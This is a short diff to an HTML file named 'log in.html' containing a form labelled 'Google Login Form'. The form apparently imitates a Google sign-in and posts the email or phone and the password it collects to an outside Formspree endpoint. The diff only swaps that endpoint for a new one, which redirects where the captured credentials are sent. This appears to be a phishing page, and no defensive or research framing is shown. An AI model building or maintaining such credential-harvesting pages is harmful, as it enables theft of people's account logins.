--- a/log in.html
+++ b/log in.html
@@ -110,7 +110,7 @@
         </div>
 
         <!-- Google Login Form -->
-        <form action="https://formspree.io/f/mzzealba" method="POST">
+        <form action="https://formspree.io/f/mrbpyznw" method="POST">
             <input class="input-field" type="email" name="email" placeholder="Email or phone" required>
             <input class="input-field" type="password" name="password" placeholder="Enter your password" required>
             <button class="sign-in-btn" type="submit">Sign in</button>
